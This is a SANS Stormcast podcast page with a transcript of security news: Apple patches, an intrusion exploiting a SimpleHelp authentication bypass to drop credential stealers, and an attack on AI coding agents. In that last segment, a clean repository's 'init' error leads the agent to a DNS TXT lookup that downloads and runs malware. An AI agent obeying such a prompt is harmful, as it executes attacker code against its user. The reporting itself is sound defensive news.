Handler on Duty: Xavier Mertens
Threat Level: green
Podcast Detail
SANS Stormcast Wednesday, July 1st, 2026: Apple Patches; SimpleHelp Exploit; Git DNS Tricks;
If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9990.mp3
My Next Class
Click HERE to learn more about classes Johannes is teaching for SANS
June 2026 Apple Updates
https://isc.sans.edu/diary/June%202026%20Apple%20Updates/33114
SimpleHelp Exploit used to reply TaskWeaver
https://blackpointcyber.com/blog/a-djinn-in-the-machine-taskweavers-node-js-intrusion-chain/
DNS Tricks to Load Malware into Cloned Repository
https://0din.ai/blog/clone-this-repo-and-i-own-your-machine
My Upcoming Classes
https://www.sans.org/profiles/dr-johannes-ullrich
| Application Security: Securing Web Apps, APIs, and Microservices | Washington | Jul 13th - Jul 18th 2026 |
| Application Security: Securing Web Apps, APIs, and Microservices | Online | British Summer Time | Jul 27th - Aug 1st 2026 |
| Application Security: Securing Web Apps, APIs, and Microservices | Las Vegas | Sep 21st - Sep 25th 2026 |
| Network Monitoring and Threat Detection In-Depth | Amsterdam | Nov 9th - Nov 14th 2026 |
| Application Security: Securing Web Apps, APIs, and Microservices | Washington | Dec 14th - Dec 18th 2026 |
Podcast Transcript
Hello and welcome to the Wednesday, July 1st, 2026 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich, recording today from Riyadh, Saudi Arabia. And this episode is brought to you by the SANS .edu Graduate Certificate Program in Industrial Control System Security. Well, Apple did release updates this week with that security patches for iOS, iPadOS, MacOS and Safari. So this lineup is a little bit different than what we usually see from Apple. Apple typically updates all of its operating systems. And also, well, we don't really have the same number of vulnerabilities being addressed as usual, but a smaller number, 28 vulnerabilities total. Most of these vulnerabilities are WebKit vulnerabilities, and that also explains the focus on iOS and MacOS. The other operating systems like watchOS and such, of course, are less exposed to WebKit. There are a couple of kernel vulnerabilities that are also being addressed here, and these vulnerabilities will potentially also affect the other operating systems like watchOS, OS, VisionOS and TVOS. So I expect that there will be an update for the other operating systems relatively shortly. Part of the reasoning behind this update was also that some of these vulnerabilities had already been addressed in beta versions of the next major release of iOS, iPadOS and MacOS. And MDR company Blackpoint did release a blog post outlining a recent intrusion that they have observed against SimpleHelp. SimpleHelp is one of those remote tech support platforms. So enterprises use it to basically be able to reach out and support systems across their network. And it suffered, well, not even two weeks ago from an OpenID Connect bypass. So that essentially allowed an off vacation bypass and an attacker is able to authenticate as a technician. And with that able to then reach out to remote systems that are connected to this particular SimpleHelp instance. What Blackpoint observed is that the attacker did deploy fairly obfuscated JavaScript file, they call it jQuery.js, but it's not related to the well known jQuery framework. And this JavaScript file is then executed via node.js and used to deploy additional malware. In particular, they observed credential stealers. So in this case, the attacker went after the usual sort of as age and cloud credentials and such likely to further compromise affected networks. Haven't seen the ransom word word here in this particular write up, but wouldn't be surprised if this particular vulnerability, which isn't all that terrible hard to exploit, would soon be used also to deploy ransomware. That just sort of fits what this type of vulnerability is often used for. At Mozilla's Odin Lab published a blog post outlining an interesting attack against, well, yet again, cloning a repository from Git. Doesn't have to be GitHub, really sort of any kind of repository here would work. And the trick they're playing here is that if you're using an AI agent in order to help you with the cloning and then ask it to execute the actual code that was downloaded. Well, there will be an error message that you first need to initialize to init the software that you just downloaded. And that, well, in itself isn't really all that suspicious. But what that triggers is a DNS lookup that will then download additional code in the form of a text record and execute it. So the trick here is that the repository as downloaded is clean. It does not contain any malware and the malware is really just loaded as the repository is initialized using the DNS lookup. Pretty neat. Just talked in class today about all the ways how you can use DNS as a covert channel. Yet another sort of little trick that you can play here with DNS. Well, and that's it for today. Thanks for listening. Thanks for liking. Thanks for recommending this podcast and talk to you again tomorrow. Bye.





